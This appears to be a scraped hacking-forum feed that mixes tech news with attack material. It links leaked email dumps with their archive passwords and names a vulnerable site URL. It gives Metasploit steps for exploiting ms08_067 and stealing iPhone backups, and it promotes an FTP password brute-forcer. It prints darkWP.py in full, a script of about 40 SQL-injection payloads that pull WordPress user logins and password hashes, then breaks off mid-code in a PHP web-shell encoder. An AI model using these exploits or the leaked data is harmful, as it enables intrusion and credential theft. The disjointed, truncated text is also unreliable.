Fi8sVrs

See inside one of Google's data centers in this guided tour. See what powers our products, and then explore on your own in Street View: http://www.google.com/about/datacenters/streetview Data centers – Google Data centers

Cam asta î?i inspir? poveste de mai jos. Spionaj, juc?rii sofisticate, micro-dispozitiv de urm?rire, microfon, camer?… ca-n filme, ce s? mai. Este aceast? un ?ân?ar …? NU! Aceasta este o “DRONE SPY INSECT” deja în produc?ie. Aceasta poate fi controlat? de la mare distan?? ?i este echipat? cu un aparat de fotografiat, microfon ?i poate ateriza pe tine, poate folosi acul pentru a lua o mostr? de ADN, durerea sim?it? fiind cea a unei în?ep?turi de ?ân?ar. Sau poate injecta un micro-dispozitiv de urm?rire RFID sub piele. Sau poate ateriza pe tine iar tu îl vei lua în casa ta sau poate zbura printr-o fereastr?. New York Times “Microdronele” reprezint? cea mai important? inova?ie din domeniul militar realizat? în ultimii ani.” … a fost odat? science fiction. Sources: Bond… James Bond | Neuronu http://www.nytimes.com/2011/06/20/world/20drones.html?pagewanted=all;&_r=0

Blocking websites and handing over repeat offenders A series of what are claimed to be leaked training manuals show that AT&T will get a lot more aggressive with its customers over suspected internet piracy, beginning this November. The documents, allegedly obtained by TorrentFreak, say that AT&T will contact customers who have been identified as pirates by copyright owners. The firm will then give users six strikes, with a variety of methods of censure, if they are accused of breaking copyright law. "In an effort to assist content owners with combating on-line piracy, AT&T will be sending alert e-mails to customers who are identified as having been downloading copyrighted content without authorization from the copyright owner," the documents read. "The reports are made by the content owners and are of IP-addresses that are associated with copyright infringing activities. AT&T will not share any personally identifiable information about its customers with content owners until authorized by the customer or required to do so by law." The incomplete leak shows that on the fourth warning AT&T customers will be redirected to an "education page" when they try to reach certain unspecified sites, although El Reg would lay a bet The Pirate Bay is on the list. Offending customers will have to complete an educational tutorial about copyright before they are allowed to carry on browsing to those sites. By the fifth alert, AT&T's documents say copyright holders will be able to start legal action against the customer, and the company will hand over the personal information of the user in question upon receipt of a court request. The date for introducing this comes on November 28, in the week following the Thanksgiving national holiday, and it is expected that Cablevision, Comcast, Time Warner Cable, and Verizon will announce similar plans around that time – but no one is talking to the press about it. The organization identifying copyright infringement is thought to be the Center for Copyright Information (CCI), which is proposing the six-strikes system. On its website the organization – which is made up of copyright holders, ISPs and privacy groups – details the six-strikes process, dubbed the Copyright Alert System. Under the proposed system, the RIAA and MPAA will notify CCI of any IP address it suspects of harboring pirates. Users will then receive a series of warnings, which after the first two suspected infringements will require a user to acknowledge receipt of the information, and then a graduated system of "mitigation measures", although the CCI states that cutting off internet access altogether isn't in the cards. "Mitigation Measures may include, for example: temporary reductions of internet speeds, redirection to a landing page until the subscriber contacts the ISP to discuss the matter or reviews and responds to some educational information about copyright, or other measures that the ISP may deem necessary to help resolve the matter," the CCI states. Users who feel they have been falsely accused have a right of appeal at any stage, the CCI states, and any requests will be subject to an independent review from the American Arbitration Association. There's no mention of what kinds of costs will be involved in appealing. AT&T's six strikes scheme is similar to that run by the French government under the name Hadopi, although the French system is seems tougher – it only allows for three strikes. So far the Gallic scheme has sent out over a million emails warning internet users who have been suspected of piracy. That country's government has spent around €12m a year since 2010 on the agency, which employs 60 copyright police. The net result of all that effort is that no one has been prosecuted under the scheme, and peer-to-peer use in France actually went up after it was started. The new French administration is now considering cutting the scheme as a waste of taxpayer money, although Hollywood mogul Harvey Weinstein loves it. ® via Leaked AT&T files show planned anti-piracy measures • The Register

more... http://www.filehost.ro/28926816/store_users_7z/ 5461 mails 7z pass archive: gWo9i4f8EU .txt size: 123 KB niche: rock music - Therion

Ce au gasit cercetatorii pe suprafata Lunii. Va schimba radical ce se stia despre corpurile ceresti Un nou studiu realizat de savantii de la Universitatea din Tennessee a descoperit ca pe suprafata Lunii exista particule care ar putea sustine viata. Cercetatorii au analizat mostre de sol de pe Luna, aduse de misiunile Apollo. Acestea contin particule de apa numite hirdroxili. Ei spun ca acestea s-au format datorita emisiei constante de materie din Soare, care ajunge pe suprafata satelitului nostru natural datorita vanturilor solare. NASA stia inca din anul 2009 ca pe Luna exista apa sub forma de gheata, insa acum este prima data cand a fost gasita si sub alta forma, care demonstreaza si modul in care s-a format. Prin urmare, apa nu a fost adusa de vreo cometa, ci s-a format chiar pe suprafata acestui corp ceresc. Vanturile solare care aduc in mod constent particule ajung usor pe suprafata Lunii, care nu are o atmosfera protectoare precum Pamantul. Particulele de hidorgen sunt aduse de acest vant, se combina cu particule de oxigen si rezulta un compus similar apei, care contine un atom de hidrogen si unul de oxigen, iar acesta este inmagazinat in sol. “Descoperirea noastra arata ca exista peste tot pe suprafata Lunii acesti hidroxili, care pot fi folositi in cazul construirii unei baze lunare umane", declara unul dintre cercetatori, Youxue Zhang. Concluzia autorului acestei cercetari este si mai impresionata: “Asta inseamna ca apa poate sa existe si pe alte corpuri ceresti indepartate, cum ar fi Mercur, asteroizii Vesta sau Eros. Toate ar putea produce apa, chiar daca au un mediu diferit”, explica Yang Liu. Studiul este sustinut si de doctorul Marc Chaussidon de la Universitatea din Lorena, Franta: “Descoperirea deschide o poarta spre o noua sursa de apa pentru corpurile ceresti din sistemul nostru solar”. via Ce au gasit cercetatorii pe suprafata Lunii. Va schimba radical ce se stia despre corpurile ceresti - Yahoo! ?tiri România

pai cand sare?

Download: http://www.filehost.ro/28924900/phpbb_users_7z/ pass archive: izNpshEqGF extrase din db-ul glimz.net in baza de date sunt 34353 mails, nu am reusit sa le extrag pe toate, poate reusiti voi: url vuln: http://www.glimz.net/info.php?festival=756 enjoy

Defense Secretary Panetta's explosive speech, with extensive disclosure of previously classified data (see today's first story), on top of extraordinary statements by the head of MI5 (Jonathan Evans), combine to speak volumes about the immediacy, scale, and ominous nature of the newly emerging threat. In the past few months, more and more senior officials in corporations and government agencies have concluded that the people who have claimed that "cybersecurity isn't a technical problem," were wrong and bear a significant part of the responsibility for the high degree of cybersecurity vulnerability now faced by their organizations. Next Friday is the deadline for veterans and high school students to register for the Cyber Foundations/CyberCenters program, that includes on-line tutorials and challenges in three areas that are the essential foundations of effective cybersecurity careers. Those who show talent will earn opportunities for acceptance in the new CyberCenters program where they will get intensive hands-on training and internships in the only fast-track to high-paying careers in cybersecurity. Fees are very low ($25) but may still be waived. Tell the veterans and high school students you know who have IT talent to register at https://www.cybercenters.org/ Sources: Deadline Approaching for Cyber Foundations / CyberCenter Program | NovaInfosec.com https://www.sans.org/newsletters/newsbites/newsbites.php?vol=14&issue=82

Description: Founder, NovaInfosecPortal.com Salvador Grec has over 16 years experience, undergraduate and graduate degrees in Electrical Engineering, and a really well known security certification. Even though his training was in Electrical Engineering, Sal has always been more of a Computer Science person at heart going back to his VIC-20, Commodore 64, and high school computer club days. After doing the IT grind for 5 years, he discovered his love of infosec and has been pursuing this career ever since. Currently, he spends his days doing cyber security paperwork drills in building and maintaining multi-billion dollar government systems. At night he runs a local infosec website and tries to get some hands-on skillz. Title: PHP Website Security, Attack Analysis, & Mitigations PHP is a very powerful language for easily developing web applications however this convenience sometimes comes at the cost of security. Issues can arise from everything from language vulnerabilities and weak default settings to insecure coding practices and misconfigurations. This presentation plans to address many of these concerns by providing valuable lessons in the security of, attacks against, and management of PHP in your environment. The talk begins with an overview of PHP security, including it’s known issues and corresponding security enhancements the maintainers have incorporated over time. Beginning with a general discussion of PHPIDS and how it can be used as an event tracker, the presentation next provides a peak into some of the more interesting attacks against a security website as well as overall trends from two years in deployment. The talk closes with a strategy for analyzing the risks in your PHP environment and applying corresponding PHP and platform/network mitigations to minimize your attack surface. http://rvasec.com/slides/2012/8_grec_php_insecurity_rvasec_2012.pptx Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Sources: Php Website Security, Attack Analysis, And Mitigations

In a bid to boost the time users spend on the site, videos that hold viewers' attention will rise higher in searches. YouTube's ongoing effort to keep visitors on its pages for longer took a new twist today, when the video portal said it will start ranking videos by how long people watch them. The move makes it more difficult to game the system by choosing a provocative thumbnail image for your video in an effort to drive clicks. Instead, creators will be rewarded for actually getting viewers to watch the whole video. It follows a similar change the Google-owned company made to its suggested videos feature earlier this year. "These changes better surface the videos that viewers actually watch, over those that they click on and then abandon," the company said at the time. The move succeeded in getting viewers to stay longer, YouTube said today. The new search ranking algorithms should have a similar effect. To help video creators adjust to the new ranking system, YouTube has added a 'time watched' metric to YouTube analytics. via YouTube now ranking videos by time watched, not clicks | Internet & Media - CNET News

Introduction to iPhone Backups: iTunes is used to back up the iPhone data to a computer. iTunes backup makes a copy of everything on the device like contacts, SMS, photos, calendar, music, call logs, configuration files, database files, keychain, network settings, offline web application cache, safari bookmarks, cookies and application data, etc. It also backups the device details like serial number, UDID, SIM hardware number and the phone number. Normal Backups: When the iPhone is connected to a computer for the first time and synced with iTunes, iTunes automatically creates a folder with device UDID (Unique device ID – 40 hexadecimal characters long) as the name and copies the device contents to the newly created folder. If the automatic sync option is turned off in iTunes, the user has to manually initiate the backup process whenever the device is connected to the computer. iTunes also initiates an automated backup when the iPhone is updated or restored. iTunes backup location varies for different operating systems and the exact directory paths are listed in Table-1. If a passcode protected iPhone is connected to the computer for the first time, iTunes will require the user to enter the passcode and unlock the device before starting the sync process. Upon unlocking the iPhone with a valid passcode, iTunes recognizes the device as authorized and allows to backup and sync with the computer. From there on, iTunes will allow to backup or sync the iPhone without entering the passcode as long as it connects to the same computer. Encrypted Backups: iTunes also provide an option to create encrypted backups. To create encrypted backups, connect the device to the computer and select ‘Encrypt iPhone Backup’ option in iTunes. During the encrypted backup, iTunes prompt the user to enter a password. Later the password is used to encrypt all the files in the backup. Backup folder contains a list of files which are not in a readable format and it consists of uniquely named files with a 40 digit alphanumeric hex value without any file extension. Example file name is: f968421bd39a938ba456ef7aa096f8627662b74a. This 40 digit hex file name in the backup folder is the SHA1 hash value of the file path appended to the respective domain name with a ‘-‘ symbol. So the hash of DomainName-filepath will match to the correct file in the backup. In iOS 5, applications and inside data are classified into 12 domains (11 system domains and one application domain). The list of system domains can be viewed from /System/Library/Backup/Domains.plist file on the iPhone. Example: Address book images backup file is – cd6702cea29fe89cf280a76794405adb17f9a0ee and this value is computed from SHA-1 (HomeDomain-Library/AddressBook/AddressBookImages.sqlitedb). *Online hash calculator – Hash: online hash value calculator iTunes stores/reads the domain names and path names from Manifest.mbdb meta file. Manifest.mbdb is a binary file that contains information about all other files in the backup along with the file sizes and file system structure data. Backup file structure in older version of iTunes is managed by two files – Manifest.mbdx and Manifest.mbdb. In which, Manifest.mbdx file acts as an index file for the backup and indexes the elements that will be found in Manifest.mbdb. Since the introduction of iTunes 10, index file (mbdx) is eliminated and the backup is managed by a single mbdb file. Manifest.Mbdb file header and record format is shown in below Tables. Header: Mbdb file header is a fixed value of 6 bytes and the value acts as a magic number to identify the mbdb files. Record: Mbdb file contain many records and each record is of variable size. Every record contains various details about a file. More technical details about iPhone backups is documented in my paper – Forensic analysis of iPhone backups Metasploit – Apple iOS Backup File Extraction module Metasploit contains a post exploitation module using which we can steal the Apple iOS backup files from a victim’s computer. However the existing module was designed for iOS 4 backups and does not support the latest iOS 5 backups. I have updated the scripts to make it work with iOS 5 backups. Below details outline the usage of updated Metasploit – Apple iOS Backup File Extraction module. I have used Metasploit 4.4 from Backtrack 5R1. Apple iOS Backup File Extraction module is a post exploitation module. Metasploit says “The post-exploitation modules (post for short) are designed to run on systems that were compromised through another vector, whether its social engineering, a guessed password, or an unpatched vulnerability”. So in order to use the iOS backup module, first we have to compromise the system using some other vector. Usage Steps: 1. Download the apple_ios_backup.rb and place it in /opt/metasploit/msf3/modules/post/multi/gather/ directory. 2. Download the apple_backup_manifestdb.rb and place it in /opt/metasploit/msf3/lib/rex/parser/ directory. 3. Open the Metasploit using msfconsole. 4. Use meterpreter as a payload and exploit a vulnerability in the target system. In my case, the victim machine is running with the Windows XP OS (192.168.209.128) which is vulnerable to ms08_067_netapi vulnerability. Following the below steps exploits the vulnerability and opens a meterpreter shell. msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.209.128 RHOST => 192.168.209.128 msf exploit(ms08_067_netapi) > exploit 5. Once the meterpreter session is established, iOS backup on the victim machine can be dumped using the following command- > run post/multi/gather/apple_ios_backup The above script searches for the iOS backup files in the default iTunes backup locations. If it does not find any backup in the target system, it will displays ‘ No users found with an iTunes backup directory’ message. If it finds the backup it dumps all the files and stores them as db files in the ~/.msf4/loot/ directory. Though Apple iOS backup extraction module dumps all the files from the victim’s backup, the level of data revealed to the attacker depends on the type of the iOS backup. If the victim machine contains an encrypted backup, the information that we get from stealing the backup files is almost nothing. Because all the files in the encrypted backup are encrypted with the user supplied iTunes password. If the victim machine contains a normal backup, we can read the sensitive data stored in all files except the Keychain database. In case of normal backups, the keychain is encrypted with a hardware key which is embedded in the iPhone. The post module can steal the iOS backups from Windows and Mac OS X machines. I have tested it for Windows. It should definitely work for OS X as well. Demonstration Video Sources: Stealing iPhone Backups using Metasploit | SecurityXploded Blog Metasploit post exploitation scripts to steal iOS 5 backups

About FTP Password Kracker FTP Password Kracker is a free software to recover your lost FTP password directly from server. It uses brute-force password cracking method based on universal FTP protocol and can recover password from any FTP server. It automatically detects and alerts you if the target FTP server allows any Anonymous (without password) connections. In case your FTP server is running on different port (other than port 21) then you can easily specify the same in the tool along with server IP address. By default it includes sample dictionary (password list) file for password cracking. However you can find good collection of password dictionaries (also called wordlists) here & here. If your password is complex then you can use tools like Crunch, Cupp to generate brute-force based or any custom password list file and then use it with 'FTP Password Kracker'. For penetration testers and forensic investigators, it can be very handy tool in discovering poorly configured FTP accounts. It works on both 32 bit & 64 bit windows systems starting from Windows XP to Windows 8. Installation & Un-installation FTP Password Kracker comes with Installer to help in local installation & un-installation. This installer has intuitive wizard which guides you through series of steps in completion of installation. At any point of time, you can uninstall the product using the Uninstaller located at following location (by default) [Windows 32 bit] C:\Program Files\SecurityXploded\FTPPasswordKracker [Windows 64 bit] C:\Program Files (x86)\SecurityXploded\FTPPasswordKracker How to use? It is very easy to use tool for any generation of users. Here are simple steps Install 'FTP Password Kracker' on any system. Enter the IP Address & Port number (default 21) of the FTP Server. Then enter the username (Example: admin, anonymous etc) Next select the password dictionary file by clicking on Browse button or simply drag & drop it. You can find a sample dictionary file in the installed location. Finally click on 'Start Crack' to start the FTP Password recovery. During the operation, you will see all statistics being displayed on the screen. Message box will be displayed on success. At the end, you can generate detailed report in HTML/XML/Text format by clicking on 'Report' button and then select the type of file from the drop down box of 'Save File Dialog'. Screenshots Here are the screenshots of FTP Password Kracker Screenshot 1: 'FTP Password Kracker' is showing the recovered FTP Password for user 'admin' Screenshot 2: Detailed Password Recovery report generated by FTP Password Kracker Disclaimer 'FTP Password Kracker' is designed with good intention to recover the Lost FTP Password. Like any other tool its use either good or bad, depends upon the user who uses it. However neither author nor SecurityXploded is in anyway responsible for damages or impact caused due to misuse of FTP Password Kracker. Read our complete 'License & Disclaimer' policy here. Release History Version 1.0: 12th Oct 2012 First public release of FTP Password Kracker. Download FTP Password Kracker FREE Download FTP Password Kracker v1.0 License : Freeware Platform : Windows XP, 2003, Vista, Win7, Win8 Download Source FTP Password Kracker : Free FTP Password Recovery & Auditing Software.

hai s-o violam

votez si eu Nokia 6310i

darkWP.py v.0.2 darkWP.py is python script that attempts to check for known SQL Injection vulnerabilities in a given WordPress installation Usage : python darkWP.py [options] Required: Define: -u "www.target.com/wpdir/" Optional: Define: -p "127.0.0.1:8080 or proxy.txt" Example: python darkWP.py -u "www.target.com/wpdir/" Example: python darkWP.py -u "www.target.com/wpdir/" -p 127.0.0.1:8080 Example: python darkWP.py -u "www.target.com/wpdir/" -p proxy.txt #!/usr/bin/python # This was written for educational purpose and pentest only. Use it at your own risk. # Author will be not responsible for any damage! # !!! Special greetz for my friend sinner_01 !!! # Toolname : darkWP.py # Coder : baltazar a.k.a b4ltazar < b4ltazar@gmail.com> # Version : 0.2 # greetz for all members of ex darkc0de.com, ljuska.org import sys, subprocess, re, urllib2, socket W = "\033[0m"; R = "\033[31m"; O = "\033[33m"; B = "\033[34m"; sqls = ["wp-content/plugins/Calendar/front_end/spidercalendarbig_seemore.php?theme_id=5&ev_ids=1&calendar_id=null%20union%20all%20select%201,1,1,1,0x62616c74617a6172,1,1,1,1,1,1,1,1,1,1,1,1+--+&date=2012-10-10&many_sp_calendar=1&cur_page_url=", "wp-content/plugins/hd-webplayer/config.php?id=1+/*!UNION*/+/*!SELECT*/+1,2,3,group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),5,6,7+from+wp_users", "?fbconnect_action=myhome&fbuserid=3+and+1=2+union+all+select+0,1,2,3,4,0x62616c74617a6172,6,7,8,9,10,11", "wp-content/plugins/ip-logger/map-details.php?lat=-1%20UNION%20ALL%20SELECT%200x62616c74617a6172,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20&lon=-1&blocked=-1", "wp-content/plugins/media-library-categories/sort.php?termid=1%20AND%20EXTRACTVALUE(1,CONCAT(CHAR(92),0x62616c74617a6172))", "wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=-1') UNION ALL SELECT NULL,NULL,0x62616c74617a6172--%20", "wp-content/plugins/media-library-categories/sort.php?termid=-1%20UNION%20ALL%20SELECT%200x62616c74617a6172,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20", "wp-content/plugins/upm-polls/includes/poll_logs.php?qid=-1 UNION ALL SELECT NULL,CONCAT(CHAR(96),0x62616c74617a6172,CHAR(96)),NULL,NULL,NULL,NULL--", "wp-content/plugins/hd-webplayer/playlist.php?videoid=1+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),2,3,4,5,6,7+from+wp_users", "wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&vasthtml_action=structure&do=editgroup&groupid=2%20AND%201=0%20UNION%20SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID=1", "index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*", "wp-admin/options-general.php?page=Sharebar&t=edit&id=1%20AND%201=0%20UNION%20SELECT%201,2,3,4,user_pass,6%20FROM%20wp_users%20WHERE%20ID=1", "index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*", "index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**SELECT**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23", "index?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users/*", "wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users--", "wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--", "wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%20null,null,null,conca(0x7c,user_login,0x7c,user_pass,0x7c),null,null,null,null,null,null,null,null%20%20from%20wp_users", "wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users", "wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users", "sf-forum?forum=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*", "sf-forum?forum=-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*", "forums?forum=1&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*", "index?page_id=2&album=S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201", "wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*", "wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain", "wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*", "myLDlinker.php?url=-2/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*", "?page_id=2/&forum=all&value=9999+union+select+(select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+LIMIT+0,1)--+&type=9&search=1&searchpage=2", "wp-content/themes/limon/cplphoto.php?postid=-2+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=2", "?event_id=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*", "wp-content/plugins/photoracer/viewimg.php?id=-99999+union+select+0,1,2,3,4,user(),6,7,8/*", "wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--", "?page_id=2&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users/*", "wp-content/plugins/wp-forum/forum_feed.php?thread=-99999+union+select+1,2,3,concat(user_login,0x2f,user_pass,0x2f,user_email),5,6,7+from+wp_users/*", "mediaHolder.php?id=-9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--", "wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--", "wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain", "wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*", "wp-content/plugins/Calendar/front_end/spidercalendarbig_seemore.php?theme_id=5&ev_ids=1&calendar_id=null union all select 1,1,1,1,concat(user_login,0x3a,user_pass),1,1,1,1,1,1,1,1,1,1,1,1+from+wp_users+--+&date=2012-10-10&many_sp_calendar=1&cur_page_url="] def logo(): print R+"\n|---------------------------------------------------------------|" print "| b4ltazar[@]gmail[dot]com |" print "| 10/2012 darkWP.py v.0.2 |" print "| b4ltazar.us |" print "| Usage: darkWP.py -h |" print "| |" print "|---------------------------------------------------------------|\n" print W if sys.platform == 'linux' or sys.platform == 'linux2': subprocess.call("clear", shell=True) logo() else: subprocess.call("cls", shell=True) logo() target = "" proxy = "None" count = 0 socket.setdefaulttimeout(30) for arg in sys.argv: if arg == "-h": print "Usage : python darkWP.py [options]" print "\n\tRequired:" print "\tDefine: -u \"www.target.com/wpdir/\"" print "\n\tOptional:" print "\tDefine: -p \"127.0.0.1:8080 or proxy.txt\"" print "\nExample: python darkWP.py -u \"www.target.com/wpdir/\"" print "Example: python darkWP.py -u \"www.target.com/wpdir/\" -p 127.0.0.1:8080" print "Example: python darkWP.py -u \"www.target.com/wpdir/\" -p proxy.txt" sys.exit(1) elif arg == "-u": target = sys.argv[count+1] elif arg == "-p": proxy = sys.argv[count+1] count += 1 if target == "": print "[-] Must include -u flag" sys.exit(1) if target[:7] != "http://": target = "http://"+target if target[-1:] != "/": target = target + "/" if proxy != "None": if len(proxy.split(".")) == 2: proxy = open(proxy, "r").read() if proxy.endswith("\n"): proxy = proxy.rstrip("\n") proxy = proxy.split("\n") print "[+] Wordpress Target:",target print "[+] Vulns Loaded:",len(sqls) proxy_list = [] if proxy != "None": print "[+] Building Proxy List..." for p in proxy: try: proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'}) opener = urllib2.build_opener(proxy_handler) opener.open("http://www.google.com") proxy_list.append(urllib2.build_opener(proxy_handler)) print "\tProxy:",p,"- Success" except: print "\tProxy:",p,"- Failed" pass if len(proxy_list) == 0: print "[-] All proxies have failed. Script Exiting" sys.exit(1) print "[+] Proxy List Complete" else: print "[-] Proxy Not Given" proxy_list.append(urllib2.build_opener()) proxy_num = 0 proxy_len = len(proxy_list) print "[+] Testing ..." for sql in sqls: try: source = proxy_list[proxy_num % proxy_len].open(target+sql, "80").read() md5s = re.findall("[a-f0-9]"*32, source) if len(md5s) >= 1 or re.findall("baltazar", source): print R+"\n[!] Found:",O+target+sql+"\n" for md5 in md5s: print "\t",md5,"\n" except(urllib2.URLError, socket.gaierror, socket.error, socket.timeout): pass except(KeyboardInterrupt, SystemExit): raise print W+"[!] Done" print "[+] Thanks for using this script, please visit b4ltazar.us" mirror: http://b4ltazar.us/codes/darkWP-0.2.py Check Proxies #!/usr/bin/env python #Check proxies ~ script by Illsuionist aka c0ax #Visit ljuska.org #Usage: checkproxy.py filename-with-proxies import sys, urllib2, time try: fajl = sys.argv[1] file = open(fajl) lines = file.readlines() file.close() print "Proxies that works:" for proxy in lines: proxy = proxy.rstrip('\n').strip() if proxy == "": continue try: proksiji = {"http":"http://%s" % proxy} url = "http://www.google.com/search?q=ljuska" usrheaders={'User-agent' : 'Mozilla/5.0'} proksi = urllib2.ProxyHandler(proksiji) openns = urllib2.build_opener(proksi, urllib2.HTTPHandler(debuglevel=0)) urllib2.install_opener(openns) zaht = urllib2.Request(url, None, usrheaders) html = urllib2.urlopen(zaht).read() print proxy except: continue except: print "Read the usage..." time.sleep(2) sys.exit(1) Game Server Info # Game Server Info Script by c0ax #Greetz baltazar, b0ne, crax0, MikiSoft, Melvin, Toro etc. #Important: here "sok.connect((ip, 27089))". # Change '27089' with port of your server. #And in ip type ip of yourserver. #Visit ljuska.org and c0axe.blogspot.com import socket def ispis(isp): isp = isp.replace('\777', '') if isp.find('m') == 0: nejmsrv = isp.split('\0') [1] mapa = isp.split('\0') [2] igra = isp.split('\0') [4] print '\nGame:', igra print '\nServer name:', nejmsrv print '\nMap:', mapa ip = '193.104.68.49' #Change this IP with IP of your server. sok = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sok.connect((ip, 27089)) sok.send('\377\377\377\377TSource Engine Query\0') while 1: konekt = sok.recv(1024) konekt = ispis(konekt) if not konekt: break print '[GET]', konekt sok.close() #EOF. Good Luck Apache Server Script start|stop|restart #!/usr/bin/env python #Apache Server start|stop|restart script by c0ax #Some of the functions ~ start|stop|reload|restart|configtest #Greetz baltazar, b0ne, Maxell, den5e, MikiSoft, Melvin crax0 etc. #Visit ljuska.org and c0axe.blogspot.com import os, sys, time arg = sys.argv[1] def start(): strt = "/etc/init.d/apache2 start" print "Starting server..." os.system(strt) time.sleep(2) print "Server is started." def stop(): stp = "/etc/init.d/apache2 stop" os.system(stp) print "Stoping server..." time.sleep(2) def restart(): rst = "/etc/init.d/apache2 restart" os.system(rst) print "Restarting server..." time.sleep(2) def configtest(): confe = "/etc/init.d/apache2 configtest" os.system(confe) print "Configuring server..." time.sleep(2) if arg == 'start': start() if arg == 'stop': stop() if arg == 'restart': restart() if arg == 'configtest': configtest() MYSQL Dumper #!/usr/bin/env python #MySql dumper by c0ax #Greetz: baltazar, b0ne, den5e, Maxell, MikiSoft, Melvin, crax0, v0da, Soul, tek0t and all another ljuska members. #Usage: python dump.py dbname dbuser userpassword hostname nameofbackupfile #Example: python dump.py ljuskadb root toor localhost ljuskadb import os, sys, time from time import gmtime backdir = "/backup" dbname = sys.argv[1] user = sys.argv[2] usrpw = sys.argv[3] hostname = sys.argv[4] bekap = sys.argv[5] timescr = time.strftime("%a, %d %b %Y %H:%M:%S ", gmtime()) main = "/usr/bin/mysqldump -u %s -p -h %s %s > %s.sql" % (user, hostname, dbname, bekap) if os.name == "posix": clsthisshit = 'clear' else: clsthisshit = 'cls' os.system(clsthisshit) if os.path.islink(backdir): print "Change the name of backup dir..." print "Visit ljuska.org and c0axe.blogspot.com" print "Exiting..." time.sleep(3) sys.exit() else: os.mkdir(backdir) os.chdir(backdir) os.system(main) time.sleep(2) if not os.listdir(backdir): print "Database %s is not dumped. Check again." % (dbname) print "Visit ljuska.org and c0axe.blogspot.com" print "Exiting..." time.sleep(3) sys.exit() else: print "%s has been dumped to %s with name %s.sql . \nVisit ljuska.org and c0axe.blogspot.com" % (dbname, backdir, bekap) print "Database %s dumped on %s." % (dbname, timescr) print "Host: %s \nDatabase: %s" % (hostname, dbname) print "Version:", os.system('mysql -V') print "Visit ljuska.org" print "Exiting..." time.sleep(3) sys.exit() PHP Base64 encoder #PHP Shell encoder by c0ax #Greetz svim mojim prijateljima, oni znaju ko su. #Usage: python encode.py 'input file name' 'output file name' #Example: python encode.py shell.php shell.txt import sys, base64, time, os fajl = sys.argv[1] ispis = sys.argv[2] if len(sys.argv) != 3: print "Usage: python encode.py 'input file name' 'output file name'" sys.exit() try: ucitan = open(fajl, "rb") ucitan = ucitan.read() except: print "Opening input file failed." print "Visit ljuska.org and c0axe.blogspot.com" print "Exiting..." time.sleep(2) sys.exit() try: if "<?php" in ucitan: ucitan = 